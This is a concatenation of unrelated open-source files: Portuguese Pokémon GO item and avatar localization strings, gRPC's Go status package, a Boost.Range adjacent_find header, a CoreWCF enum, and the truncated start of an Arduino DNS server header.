assertEquals(scce.getMessage(), message.getMessage());
session.getFeedbackMessages().clear();
}
}
| {
"pile_set_name": "Github"
} |
item_great_ball_desc
Poké Bola de alto rendimento. Tem um índice de êxito superior ao da Poké Bola padrão.
item_great_ball_name
Grande Bola
item_hyper_potion_desc
Remédio em spray que cura machucados e que restaura os PS de um Pokémon em {1} pontos.
item_hyper_potion_name
Hiperpoção
item_master_ball_desc
A Poké Bola com melhor desempenho. Pega qualquer Pokémon selvagem sem falha.
item_master_ball_name
Bola Mestra
item_max_potion_desc
Remédio em spray que cura machucados e que restaura todos os PS de um Pokémon.
item_max_potion_name
Poção Máxima
item_revive_desc
Remédio para reanimar Pokémon desmaiados e que também restaura metade de seus PS.
item_revive_name
Reviver
item_max_revive_desc
Remédio para reanimar Pokémon desmaiados e que também restaura todos os seus PS.
item_max_revive_name
Máximo Reviver
item_poke_ball_desc
Um dispositivo para pegar Pokémon selvagens, que é jogado como uma bola os encapsulando.
item_poke_ball_name
Poké Bola
item_potion_desc
Remédio em spray que cura machucados e que restaura os PS de um Pokémon em {1} pontos.
item_potion_name
Poção
item_razz_berry_desc
Dê esta Fruta a um Pokémon para pegá-lo com mais facilidade.
item_razz_berry_name
Fruta Frambo
item_special_camera_name
Câmera
item_special_camera_desc
Você poderá usar a sua câmera para fotografar Pokémon selvagens quando os encontrar.
item_super_potion_desc
Remédio em spray que cura machucados e que restaura os PS de um Pokémon em {1} pontos.
item_super_potion_name
Superpoção
item_ultra_ball_desc
Poké Bola com desempenho superior. Tem um índice de êxito superior ao da Grande Bola.
item_ultra_ball_name
Ultra Bola
item_x_attack_desc
INDEFINIDO
item_x_attack_name
Ataque X
item_x_defense_desc
INDEFINIDO
item_x_defense_name
Defesa X
item_x_miracle_desc
INDEFINIDO
item_x_miracle_name
INDEFINIDO
item_bluk_berry_desc
INDEFINIDO
item_bluk_berry_name
Fruta Roama
item_wepar_berry_desc
INDEFINIDO
item_wepar_berry_name
Fruta Ocipêra
item_nanab_berry_desc
Dê esta fruta a um Pokémon para acalmá-lo e torná-lo menos imprevisível.
item_nanab_berry_name
Fruta Anaba
item_pinap_berry_desc
Dê esta fruta a um Pokémon para receber mais doces ao pegá-lo.
item_pinap_berry_name
Fruta Caxí
item_pokemon_bag_name
Upgrade da caixa de Pokémon
item_pokemon_bag_desc
Aumenta o tamanho da sua coleção de Pokémon.
item_item_pack_name
Combo de itens
item_item_pack_desc
Aumenta o tamanho da sua Bolsa.
pokeball.20_title
20 Poké Bolas
pokeball.20_description
20 Poké Bolas para pegar Pokémon selvagens!
pokeball.100_title
100 Poké Bolas
pokeball.100_description
100 Poké Bolas para pegar Pokémon selvagens!
pokeball.200_title
200 Poké Bolas
pokeball.200_description
200 Poké Bolas para pegar Pokémon selvagens!
pokemonstorageupgrade.1_title
Upgrade do estoque de Pokémon
pokemonstorageupgrade.1_description
Aumenta o estoque de Pokémon em {0}.
itemstorageupgrade.1_title
Upgrade da Bolsa
itemstorageupgrade.1_description
Aumenta o estoque de itens em {0}.
item_lucky_egg_name
Ovo da Sorte
item_lucky_egg_desc
Um ovo cheio de felicidade e que faz você ganhar o dobro de PE por 30 minutos.
luckyegg.1_title
Ovo da Sorte
luckyegg.1_description
Um Ovo cheio de felicidade que faz você ganhar o dobro de PE por 30 minutos.
luckyegg.5_title
5 Ovos da Sorte
luckyegg.5_description
5 Ovos cheios de felicidade que fazem você ganhar o dobro de PE por 30 minutos.
luckyegg.8_title
8 Ovos da Sorte
luckyegg.8_description
8 Ovos cheios de felicidade que fazem você ganhar o dobro de PE por 30 minutos.
luckyegg.25_title
25 Ovos da Sorte
luckyegg.25_description
25 Ovos cheios de felicidade que fazem você ganhar o dobro de PE por 30 minutos.
item_incense_ordinary_name
Incenso
item_incense_ordinary_desc
Incenso de fragrância misteriosa que atrai Pokémon selvagens até você por 30 minutos.
incenseordinary.1_title
Incenso
incenseordinary.1_description
Incenso de fragrância misteriosa que atrai Pokémon selvagens até você por 30 minutos.
incenseordinary.8_title
8 Incensos
incenseordinary.8_description
8 Incensos. A fragrância misteriosa atrai Pokémon selvagens até você por 30 minutos.
incenseordinary.25_title
25 Incensos
incenseordinary.25_description
25 Incensos. A fragrância misteriosa atrai Pokémon selvagens até você por 30 minutos.
incubatorbasic.1_title
Incubadora de Ovo
incubatorbasic.1_description
Dispositivo de incubação que ajuda a chocar um Ovo conforme você anda. Pode ser usado 3 vezes.
item_incubator_basic_name
Incubadora de Ovo
item_incubator_basic_desc
Dispositivo de incubação que ajuda a chocar um Ovo conforme você anda. Pode ser usado 3 vezes.
item_incubator_basic_unlimited_name
Incubadora de Ovo ∞
item_incubator_basic_unlimited_desc
Dispositivo de incubação que choca um Ovo após uma certa distância caminhada. Uso ilimitado!
pokecoin.1000_title
1.000 Pokémoedas apenas para teste
pokecoin.1000_description
pokecoin.100_title
100 Pokémoedas
pokecoin.100_description
pokecoin.550_title
550 Pokémoedas
pokecoin.550_description
pokecoin.1200_title
1.200 Pokémoedas
pokecoin.1200_description
pokecoin.2500_title
2.500 Pokémoedas
pokecoin.2500_description
pokecoin.5200_title
5.200 Pokémoedas
pokecoin.5200_description
pokecoin.14500_title
14.500 Pokémoedas
pokecoin.14500_description
item_troy_disk_name
Módulo Atrair
item_troy_disk_desc
Atrai Pokémon a uma Poképarada por 30 minutos. Pode beneficiar outras pessoas por perto.
troydisk.1_title
Módulo Atrair
troydisk.1_description
Atrai Pokémon a uma Poképarada por 30 minutos. Pode beneficiar outras pessoas por perto.
troydisk.8_title
8 Módulos Atrair
troydisk.8_description
Atrai Pokémon a uma Poképarada por 30 minutos. Pode beneficiar outras pessoas por perto.
item_sun_stone_name
Pedra Solar
item_sun_stone_desc
Pedra peculiar que faz com que certas espécies de Pokémon evoluam. É vermelha como o sol ao entardecer.
item_kings_rock_name
Pedra do Rei
item_kings_rock_desc
Pedra que faz com que certas espécies de Pokémon evoluam. Lembra uma coroa.
item_metal_coat_name
Revestimento Metálico
item_metal_coat_desc
Revestimento que faz com que certas espécies de Pokémon evoluam. É uma película de metal especial.
item_dragon_scale_name
Escama de Dragão
item_dragon_scale_desc
Escama que faz com que certas espécies de Pokémon evoluam. É robusta e resistente.
item_up_grade_name
Melhora
item_up_grade_desc
Dispositivo transparente que faz com que certas espécies de Pokémon evoluam. Produzido pela Silph Co.
avatar_f_backpack_cute_bundle_icon
Mochila com laço
avatar_f_backpack_default_bundle_icon
Mochila urbana
avatar_f_backpack_empty_bundle_icon
Sem bolsa
avatar_f_belt_simple_bundle_icon
Fivela plana
avatar_f_belt_default_bundle_icon
Fivela de Poké Bola
avatar_f_belt_empty_bundle_icon
Sem cinto
avatar_f_glasses_mask_bundle_icon
Máscara misteriosa
avatar_f_glasses_3d_bundle_icon
Óculos 3D
avatar_f_glasses_thick_bundle_icon
Óculos para ler
avatar_f_glasses_empty_bundle_icon
Sem óculos
avatar_f_gloves_default_bundle_icon
Luvas sem dedos
avatar_f_gloves_empty_bundle_icon
Sem luvas
avatar_f_hat_knitted_bundle_icon
Gorro de lã
avatar_f_hat_fedora_bundle_icon
Chapéu com aba
avatar_f_hat_tophat_bundle_icon
Cartola
avatar_f_hat_casket_bundle_icon
Boina
avatar_f_hat_default_a_bundle_icon
Chapéu de Poké Bola
avatar_f_hat_default_b_bundle_icon
Chapéu esportivo
avatar_f_hat_empty_bundle_icon
Sem chapéu
avatar_f_necklace_heart_bundle_icon
Gargantilha com coração
avatar_f_necklace_star_bundle_icon
Gargantilha com estrela
avatar_f_necklace_default_bundle_icon
Gargantilha de fita
avatar_f_necklace_empty_bundle_icon
Sem colar
avatar_f_pants_neon_bundle_icon
Calça legging
avatar_f_pants_skinnyjeans_bundle_icon
Calça colada
avatar_f_pants_shorts_bundle_icon
Short curto
avatar_f_pants_miniskirt_wave_bundle_icon
Saia ondulada
avatar_f_pants_miniskirt_bundle_icon
Saia listrada
avatar_f_pants_miniskirt_turbine_bundle_icon
Saia godê
avatar_f_pants_default_bundle_icon
Body de corrida
avatar_f_shirt_tshirt_pikachu_bundle_icon
Blusa de Pikachu
avatar_f_shirt_tanktop_pikachu_bundle_icon
Camiseta de Pikachu
avatar_f_shirt_tanktop_charizard_bundle_icon
Camiseta de Charizard
avatar_f_shirt_sweater_valor_bundle_icon
Gola alta da Equipe Valor
avatar_f_shirt_sweater_mystic_bundle_icon
Gola alta da Equipe Sabedoria
avatar_f_shirt_sweater_instinct_bundle_icon
Gola alta da Equipe Instinto
avatar_f_shirt_sweater_30_bundle_icon
Gola alta trinta
avatar_f_shirt_tshirt_cycling_bundle_icon
Blusa esportiva
avatar_f_shirt_buttondown_bundle_icon
Camisa de botão colada
avatar_f_shirt_tanktop_bundle_icon
Camiseta de Treinador
avatar_f_shirt_default_bundle_icon
Manga longa clássica
avatar_f_shoes_default_bundle_icon
Tênis de correr
avatar_f_shoes_empty_bundle_icon
Sem calçados
avatar_f_socks_thighhighs_bundle_icon
Polainas de lã
avatar_f_socks_default_bundle_icon
Polainas longas
avatar_f_socks_empty_bundle_icon
Sem meias
avatar_m_backpack_default_bundle_icon
Mochila de Treinador
avatar_m_backpack_empty_bundle_icon
Sem bolsa
avatar_m_glasses_mask_bundle_icon
Máscara misteriosa
avatar_m_glasses_3d_bundle_icon
Óculos 3D
avatar_m_glasses_thick_bundle_icon
Óculos para ler
avatar_m_glasses_empty_bundle_icon
Sem óculos
avatar_m_gloves_default_bundle_icon
Luvas sem dedos
avatar_m_gloves_empty_bundle_icon
Sem luvas
avatar_m_hat_fedora_bundle_icon
Chapéu com aba
avatar_m_hat_tophat_bundle_icon
Cartola
avatar_m_hat_casket_bundle_icon
Boina
avatar_m_hat_default_bundle_icon
Viseira de Treinador
avatar_m_hat_empty_bundle_icon
Sem chapéu
avatar_m_pants_sweats_bundle_icon
Calça de treino esportiva
avatar_m_pants_skinnyjeans_bundle_icon
Calça justa
avatar_m_pants_default_bundle_icon
Calção esportivo
avatar_m_shirt_blazer_bundle_icon
Blazer
avatar_m_shirt_longsleeves_charizard_bundle_icon
Pulôver de Charizard
avatar_m_shirt_longsleeves_pikachu_bundle_icon
Pulôver de Pikachu
avatar_m_shirt_tshirt_instinct_bundle_icon
Camisa da Equipe Instinto
avatar_m_shirt_tshirt_mystic_bundle_icon
Camisa da Equipe Sabedoria
avatar_m_shirt_tshirt_valor_bundle_icon
Camisa da Equipe Valor
avatar_m_shirt_turtleneck_30_bundle_icon
Gola alta trinta
avatar_m_shirt_tshirt_geometric_bundle_icon
Camisa diagonal
avatar_m_shirt_sweatshirt_sporty_bundle_icon
Moletom esportivo
avatar_m_shirt_sweatshirt_streak_bundle_icon
Moletom faixa
avatar_m_shirt_default_2_bundle_icon
Moletom clássico
avatar_m_shirt_default_1_bundle_icon
Moletom coluna
avatar_m_shirt_default_0_bundle_icon
Moletom banda
avatar_m_shirt_default_3_bundle_icon
Moletom ponta
avatar_m_shoes_default_bundle_icon
Tênis de correr
avatar_m_shoes_empty_bundle_icon
Sem calçados
avatar_m_socks_default_bundle_icon
Meia-calça
avatar_m_socks_empty_bundle_icon
Sem meias
avatar_m_hat_magikarp_bundle_icon
Chapéu de Magikarp
avatar_f_hat_magikarp_bundle_icon
Chapéu de Magikarp
avatar_m_hat_adventure_bundle_icon
Chapéu de expedição
avatar_f_hat_adventure_bundle_icon
Chapéu de expedição
paidraidticket.1_title
Passe de Reide Premium
paidraidticket.1_description
Um Passe de Reide que pode ser usado para participar de um Reide.
maxrevive.6_title
6 Máximo Reviver
maxrevive.6_description
6 Máximo Reviver que podem reviver um Pokémon desmaiado e restaurar todos os seus PS.
oneyearanniversary.1_title
Caixa de Aniversário
maxpotion.10_title
10 Poções Máximas
maxpotion.10_description
10 Poções Máximas que restauram todos os PS de 10 Pokémon.
f_shirt_tshirt_fest_chicago_2017_bundle_icon
Camiseta do Festival de <i>Pokémon GO</i>
m_shirt_tshirt_fest_chicago_2017_bundle_icon
Camiseta do Festival de <i>Pokémon GO</i>
bundle.general1.small.1_title
Combo Especial
bundle.general1.medium.1_title
Combo Supergenial
bundle.general1.large.1_title
Combo Ultraespecial
avatar_m_hat_mimikyu_icon
Chapéu disfarce de Mimikyu
avatar_f_hat_mimikyu_icon
Chapéu disfarce de Mimikyu
f_hat_ultra_bundle_icon
Chapéu de Ultra Moon
f_shirt_ultra_bundle_icon
Blusa de Ultra Moon
f_backpack_ultra_bundle_icon
Mochila de Ultra Moon
f_pants_ultra_bundle_icon
Short de Ultra Moon
f_shoes_ultra_bundle_icon
Sandálias de Ultra Moon
m_hat_ultra_bundle_icon
Chapéu de Ultra Sun
m_shirt_ultra_bundle_icon
Regata de Ultra Sun
m_backpack_ultra_bundle_icon
Mochila de Ultra Sun
m_pants_ultra_bundle_icon
Bermuda de Ultra Sun
m_shoes_ultra_bundle_icon
Tênis de Ultra Sun
item_star_piece_name
Pedaço de Estrela
item_star_piece_desc
Um pequeno caco de uma linda joia que faz você ganhar 50% a mais de Poeira Estelar por 30 minutos.
starpiece.1_description
Um pequeno caco de uma linda joia que faz você ganhar 50% a mais de Poeira Estelar por 30 minutos.
starpiece.8_description
8 Pedaços de Estrela que fazem você ganhar 50% a mais de Poeira Estelar por 30 minutos.
starpiece.25_description
25 Pedaços de Estrela que fazem você ganhar 50% a mais de Poeira Estelar por 30 minutos.
starpiece.1_title
Pedaço de Estrela
starpiece.8_title
8 Pedaços de Estrela
starpiece.25_title
25 Pedaços de Estrela
bundle.general2.small.1_title
Combo de Inverno
bundle.general3.small.1_title
Combo de Inverno
bundle.general2.medium.1_title
Combo Supergenial
bundle.general3.medium.1_title
Combo Supergenial
bundle.general2.large.1_title
Combo Ultraespecial
bundle.general3.large.1_title
Combo Ultraespecial
m_shoes_fisher_bundle_icon
Bota de pescador
m_hat_jogger_bundle_icon
Viseira de corredor
m_glasses_jogger_bundle_icon
Óculos escuros de corredor
m_shirt_jogger_bundle_icon
Top de corredor
m_pants_jogger_bundle_icon
Bermuda de corredor
m_shoes_jogger_bundle_icon
Tênis de corredor
m_gloves_jogger_bundle_icon
Relógio de corredor
f_shirt_battlegirl_bundle_icon
Top de lutadora
f_gloves_battlegirl_bundle_icon
Luvas de lutadora
f_pants_battlegirl_bundle_icon
Shorts de lutadora
f_shoes_battlegirl_bundle_icon
Tênis de lutadora
avatar_f_pants_battlegirl_bundle_icon
Shorts de lutadora
avatar_f_shoes_battlegirl_bundle_icon
Tênis de lutadora
avatar_m_gloves_jogger_bundle_icon
Relógio de corredor
avatar_m_pants_jogger_bundle_icon
Bermuda de corredor
avatar_f_gloves_battlegirl_bundle_icon
Luvas de lutadora
avatar_f_shirt_battlegirl_bundle_icon
Top de lutadora
avatar_m_shirt_jogger_bundle_icon
Top de corredor
avatar_m_shoes_jogger_bundle_icon
Tênis de corredor
avatar_m_glasses_jogger_bundle_icon
Óculos escuros de corredor
avatar_m_shoes_fisher_bundle_icon
Bota de pescador
avatar_m_hat_jogger_bundle_icon
Viseira de corredor
avatar_m_pants_fisher_bundle_icon
Calça de pescador
avatar_m_shirt_fisher_bundle_icon
Veste de pescador
avatar_m_hat_fisher_bundle_icon
Boné de pescador
avatar_f_hat_teamrocket_bundle_icon
Chapéu da Equipe Rocket
avatar_f_shirt_teamrocket_0_bundle_icon
Blusa da Equipe Rocket
avatar_f_shirt_teamrocket_1_bundle_icon
Blusa da Equipe Rainbow Rocket
avatar_f_gloves_teamrocket_bundle_icon
Luvas da Equipe Rocket
avatar_f_belt_teamrocket_1_bundle_icon
Cinto da Equipe Rainbow Rocket
avatar_f_pants_teamrocket_bundle_icon
Saia da Equipe Rocket
avatar_f_shoes_teamrocket_0_bundle_icon
Botas da Equipe Rocket
avatar_f_shoes_teamrocket_1_bundle_icon
Botas da Equipe Rainbow Rocket
avatar_m_hat_teamrocket_bundle_icon
Chapéu da Equipe Rocket
avatar_m_shirt_teamrocket_0_bundle_icon
Camisa da Equipe Rocket
avatar_m_shirt_teamrocket_1_bundle_icon
Camisa da Equipe Rainbow Rocket
avatar_m_gloves_teamrocket_bundle_icon
Luvas da Equipe Rocket
avatar_m_pants_teamrocket_bundle_icon
Calça da Equipe Rocket
avatar_m_shoes_teamrocket_0_bundle_icon
Botas da Equipe Rocket
avatar_m_shoes_teamrocket_1_bundle_icon
Botas da Equipe Rainbow Rocket
avatar_f_belt_teamrocket_0_bundle_icon
Cinto da Equipe Rocket
avatar_m_hat_frlg_bundle_icon
Boné FireRed
avatar_m_shirt_frlg_bundle_icon
Camisa FireRed
avatar_m_backpack_frlg_bundle_icon
Mochila FireRed
avatar_m_gloves_frlg_bundle_icon
Pulseiras FireRed
avatar_m_pants_frlg_bundle_icon
Calça FireRed
avatar_m_shoes_frlg_bundle_icon
Sapatos FireRed
avatar_f_hat_frlg_bundle_icon
Chapéu LeafGreen
avatar_f_shirt_frlg_bundle_icon
Blusa LeafGreen
avatar_f_backpack_frlg_bundle_icon
Bolsa LeafGreen
avatar_f_gloves_frlg_bundle_icon
Pulseiras LeafGreen
avatar_f_pants_frlg_bundle_icon
Saia LeafGreen
avatar_f_shoes_frlg_bundle_icon
Sapatos LeafGreen
avatar_f_shirt_gymleader_bundle_icon
Blusa de Líder de Ginásio
avatar_f_gloves_gymleader_bundle_icon
Luvas de Líder de Ginásio
avatar_f_pants_gymleader_bundle_icon
Saia de Líder de Ginásio
avatar_f_shoes_gymleader_bundle_icon
Tênis de Líder de Ginásio
avatar_m_shirt_gymleader_bundle_icon
Camisa de Líder de Ginásio
avatar_m_gloves_gymleader_bundle_icon
Luvas de Líder de Ginásio
avatar_m_pants_gymleader_bundle_icon
Bermuda de Líder de Ginásio
avatar_m_shoes_gymleader_bundle_icon
Tênis de Líder de Ginásio
bundle.general4.small.1_title
Combo Dia Comunitário
avatar_f_shirt_earthday_2018_bundle_icon
Blusa Surfe Blue
avatar_m_shirt_earthday_2018_bundle_icon
Blusa Surfe Blue
bundle.general2.small.1.itembox_title
Combo de Itens (beta)
bundle.general2.medium.1.itembox_title
Combo de Itens prata (beta)
bundle.general2.large.1.itembox_title
Combo de Itens ouro (beta)
avatar_m_shirt_mew_bundle_icon
Camiseta de Mew
avatar_f_shirt_mew_bundle_icon
Camiseta de Mew
avatar_m_shirt_latias_latios_bundle_icon
Camisa de Latios e Latias
avatar_f_shirt_latias_latios_bundle_icon
Blusa de Latios e Latias
avatar_f_hat_pikachufan_bundle_icon
Gigolete Fã de Pikachu
avatar_f_shirt_pikachufan_bundle_icon
Blusa Fã de Pikachu
avatar_f_pants_pikachufan_bundle_icon
Short Fã de Pikachu
avatar_f_shoes_pikachufan_bundle_icon
Tênis Fã de Pikachu
avatar_m_hat_pikachufan_bundle_icon
Gigolete Fã de Pikachu
avatar_m_shirt_pikachufan_bundle_icon
Blusa Fã de Pikachu
avatar_m_pants_pikachufan_bundle_icon
Bermuda Fã de Pikachu
avatar_m_shoes_pikachufan_bundle_icon
Tênis Fã de Pikachu
avatar_f_glasses_teardrop_bundle_icon
Óculos escuros aviador
m_glasses_teardrop_bundle_icon
Óculos escuros aviador
item_golden_pinap_berry_desc
Dê esta fruta a um Pokémon para receber mais doces ao pegá-lo. Será mais fácil pegar Pokémon com ela.
item_golden_pinap_berry_name
Fruta Caxí prateada
avatar_f_shirt_celebi_bundle_icon
Camiseta de Celebi
avatar_m_shirt_celebi_bundle_icon
Camiseta de Celebi
avatar_m_hat_hgss_bundle_icon
Boné de Johto
avatar_m_backpack_hgss_bundle_icon
Bolsa de Johto
avatar_m_shirt_hgss_bundle_icon
Casaco de Johto
avatar_m_pants_hgss_bundle_icon
Calça de Johto
avatar_m_shoes_hgss_bundle_icon
Tênis de Johto
avatar_f_hat_hgss_bundle_icon
Boné de Johto
avatar_f_backpack_hgss_bundle_icon
Bolsa de Johto
avatar_f_shirt_hgss_bundle_icon
Blusa de Johto
avatar_f_pants_hgss_bundle_icon
Jardineira de Johto
avatar_f_socks_hgss_bundle_icon
Meias de Johto
avatar_f_shoes_hgss_bundle_icon
Sapatos de Johto
bundle.general5.small.1_title
Event Box
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright 2017 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
// Package status implements errors returned by gRPC. These errors are
// serialized and transmitted on the wire between server and client, and allow
// for additional data to be transmitted via the Details field in the status
// proto. gRPC service handlers should return an error created by this
// package, and gRPC clients should expect a corresponding error to be
// returned from the RPC call.
//
// This package upholds the invariants that a non-nil error may not
// contain an OK code, and an OK code must result in a nil error.
package status
import (
"errors"
"fmt"
"github.com/golang/protobuf/proto"
"github.com/golang/protobuf/ptypes"
spb "google.golang.org/genproto/googleapis/rpc/status"
"google.golang.org/grpc/codes"
)
// statusError is an alias of a status proto. It implements error and Status,
// and a nil statusError should never be returned by this package.
type statusError spb.Status
func (se *statusError) Error() string {
p := (*spb.Status)(se)
return fmt.Sprintf("rpc error: code = %s desc = %s", codes.Code(p.GetCode()), p.GetMessage())
}
func (se *statusError) GRPCStatus() *Status {
return &Status{s: (*spb.Status)(se)}
}
// Status represents an RPC status code, message, and details. It is immutable
// and should be created with New, Newf, or FromProto.
type Status struct {
s *spb.Status
}
// Code returns the status code contained in s.
func (s *Status) Code() codes.Code {
if s == nil || s.s == nil {
return codes.OK
}
return codes.Code(s.s.Code)
}
// Message returns the message contained in s.
func (s *Status) Message() string {
if s == nil || s.s == nil {
return ""
}
return s.s.Message
}
// Proto returns s's status as an spb.Status proto message.
func (s *Status) Proto() *spb.Status {
if s == nil {
return nil
}
return proto.Clone(s.s).(*spb.Status)
}
// Err returns an immutable error representing s; returns nil if s.Code() is
// OK.
func (s *Status) Err() error {
if s.Code() == codes.OK {
return nil
}
return (*statusError)(s.s)
}
// New returns a Status representing c and msg.
func New(c codes.Code, msg string) *Status {
return &Status{s: &spb.Status{Code: int32(c), Message: msg}}
}
// Newf returns New(c, fmt.Sprintf(format, a...)).
func Newf(c codes.Code, format string, a ...interface{}) *Status {
return New(c, fmt.Sprintf(format, a...))
}
// Error returns an error representing c and msg. If c is OK, returns nil.
func Error(c codes.Code, msg string) error {
return New(c, msg).Err()
}
// Errorf returns Error(c, fmt.Sprintf(format, a...)).
func Errorf(c codes.Code, format string, a ...interface{}) error {
return Error(c, fmt.Sprintf(format, a...))
}
// ErrorProto returns an error representing s. If s.Code is OK, returns nil.
func ErrorProto(s *spb.Status) error {
return FromProto(s).Err()
}
// FromProto returns a Status representing s.
func FromProto(s *spb.Status) *Status {
return &Status{s: proto.Clone(s).(*spb.Status)}
}
// FromError returns a Status representing err if it was produced from this
// package or has a method `GRPCStatus() *Status`. Otherwise, ok is false and a
// Status is returned with codes.Unknown and the original error message.
func FromError(err error) (s *Status, ok bool) {
if err == nil {
return &Status{s: &spb.Status{Code: int32(codes.OK)}}, true
}
if se, ok := err.(interface{ GRPCStatus() *Status }); ok {
return se.GRPCStatus(), true
}
return New(codes.Unknown, err.Error()), false
}
// Convert is a convenience function which removes the need to handle the
// boolean return value from FromError.
func Convert(err error) *Status {
s, _ := FromError(err)
return s
}
// WithDetails returns a new status with the provided details messages appended to the status.
// If any errors are encountered, it returns nil and the first error encountered.
func (s *Status) WithDetails(details ...proto.Message) (*Status, error) {
if s.Code() == codes.OK {
return nil, errors.New("no error details for status with code OK")
}
// s.Code() != OK implies that s.Proto() != nil.
p := s.Proto()
for _, detail := range details {
any, err := ptypes.MarshalAny(detail)
if err != nil {
return nil, err
}
p.Details = append(p.Details, any)
}
return &Status{s: p}, nil
}
// Details returns a slice of details messages attached to the status.
// If a detail cannot be decoded, the error is returned in place of the detail.
func (s *Status) Details() []interface{} {
if s == nil || s.s == nil {
return nil
}
details := make([]interface{}, 0, len(s.s.Details))
for _, any := range s.s.Details {
detail := &ptypes.DynamicAny{}
if err := ptypes.UnmarshalAny(any, detail); err != nil {
details = append(details, err)
continue
}
details = append(details, detail.Message)
}
return details
}
// Code returns the Code of the error if it is a Status error, codes.OK if err
// is nil, or codes.Unknown otherwise.
func Code(err error) codes.Code {
// Don't use FromError to avoid allocation of OK status.
if err == nil {
return codes.OK
}
if se, ok := err.(interface{ GRPCStatus() *Status }); ok {
return se.GRPCStatus().Code()
}
return codes.Unknown
}
| {
"pile_set_name": "Github"
} |
// Copyright Neil Groves 2009. Use, modification and
// distribution is subject to the Boost Software License, Version
// 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
//
// For more information, see http://www.boost.org/libs/range/
//
#ifndef BOOST_RANGE_ALGORITHM_ADJACENT_FIND_HPP_INCLUDED
#define BOOST_RANGE_ALGORITHM_ADJACENT_FIND_HPP_INCLUDED
#include <boost/concept_check.hpp>
#include <boost/range/begin.hpp>
#include <boost/range/end.hpp>
#include <boost/range/concepts.hpp>
#include <boost/range/value_type.hpp>
#include <boost/range/detail/range_return.hpp>
#include <algorithm>
namespace boost
{
namespace range
{
/// \brief template function adjacent_find
///
/// range-based version of the adjacent_find std algorithm
///
/// \pre ForwardRange is a model of the ForwardRangeConcept
/// \pre BinaryPredicate is a model of the BinaryPredicateConcept
template< typename ForwardRange >
inline typename range_iterator<ForwardRange>::type
adjacent_find(ForwardRange & rng)
{
BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
return std::adjacent_find(boost::begin(rng),boost::end(rng));
}
/// \overload
template< typename ForwardRange >
inline typename range_iterator<const ForwardRange>::type
adjacent_find(const ForwardRange& rng)
{
BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
return std::adjacent_find(boost::begin(rng),boost::end(rng));
}
/// \overload
template< typename ForwardRange, typename BinaryPredicate >
inline typename range_iterator<ForwardRange>::type
adjacent_find(ForwardRange & rng, BinaryPredicate pred)
{
BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
BOOST_RANGE_CONCEPT_ASSERT((BinaryPredicateConcept<BinaryPredicate,
typename range_value<ForwardRange>::type,
typename range_value<ForwardRange>::type>));
return std::adjacent_find(boost::begin(rng),boost::end(rng),pred);
}
/// \overload
template< typename ForwardRange, typename BinaryPredicate >
inline typename range_iterator<const ForwardRange>::type
adjacent_find(const ForwardRange& rng, BinaryPredicate pred)
{
BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
BOOST_RANGE_CONCEPT_ASSERT((BinaryPredicateConcept<BinaryPredicate,
typename range_value<const ForwardRange>::type,
typename range_value<const ForwardRange>::type>));
return std::adjacent_find(boost::begin(rng),boost::end(rng),pred);
}
// range_return overloads
/// \overload
template< range_return_value re, typename ForwardRange >
inline typename range_return<ForwardRange,re>::type
adjacent_find(ForwardRange & rng)
{
BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
return range_return<ForwardRange,re>::
pack(std::adjacent_find(boost::begin(rng),boost::end(rng)),
rng);
}
/// \overload
template< range_return_value re, typename ForwardRange >
inline typename range_return<const ForwardRange,re>::type
adjacent_find(const ForwardRange& rng)
{
BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
return range_return<const ForwardRange,re>::
pack(std::adjacent_find(boost::begin(rng),boost::end(rng)),
rng);
}
/// \overload
template< range_return_value re, typename ForwardRange, typename BinaryPredicate >
inline typename range_return<ForwardRange,re>::type
adjacent_find(ForwardRange& rng, BinaryPredicate pred)
{
BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
BOOST_RANGE_CONCEPT_ASSERT((BinaryPredicateConcept<BinaryPredicate,
typename range_value<ForwardRange>::type,
typename range_value<ForwardRange>::type>));
return range_return<ForwardRange,re>::
pack(std::adjacent_find(boost::begin(rng),boost::end(rng),pred),
rng);
}
/// \overload
template< range_return_value re, typename ForwardRange, typename BinaryPredicate >
inline typename range_return<const ForwardRange,re>::type
adjacent_find(const ForwardRange& rng, BinaryPredicate pred)
{
BOOST_RANGE_CONCEPT_ASSERT((ForwardRangeConcept<ForwardRange>));
return range_return<const ForwardRange,re>::
pack(std::adjacent_find(boost::begin(rng),boost::end(rng),pred),
rng);
}
} // namespace range
using range::adjacent_find;
} // namespace boost
#endif // include guard
| {
"pile_set_name": "Github"
} |
namespace CoreWCF.Description
{
public enum MessageDirection
{
Input = 0,
Output = 1,
}
static class MessageDirectionHelper
{
internal static bool IsDefined(MessageDirection value)
{
return (value == MessageDirection.Input || value == MessageDirection.Output);
}
internal static MessageDirection Opposite(MessageDirection d)
{
return d == MessageDirection.Input ? MessageDirection.Output : MessageDirection.Input;
}
}
} | {
"pile_set_name": "Github"
} |
#ifndef DNSServer_h
#define DNSServer_h
#include <WiFiUdp.h>
#define DNS_QR_QUERY 0
#define DNS_QR_RESPONSE 1
#define DNS_OPCODE_QUERY 0
#define DNS_QCLASS_IN 1
#define DNS_QCLASS_ANY 255
#define DNS_QTYPE_A 1
#define DNS_QTYPE_ANY 255
#define MAX_DNSNAME_LENGTH 253
#define MAX_DNS_PACKETSIZE 512
enum class DNSReplyCode
{
NoError = 0,
FormError = 1,
ServerFailure = 2,
NonExistentDomain = 3,
NotImplemented = 4,
Refused = 5,
YXDomain = 6,
YXRRSet = 7,
NXRRSet = 8
};
struct DNSHeader
{
uint16_t ID; // identification number
unsigned char RD : 1; // recursion desired
unsigned char TC : 1; // truncated message
unsigned char AA : 1; // authoritive answer
unsigned char OPCode : 4; // message_type
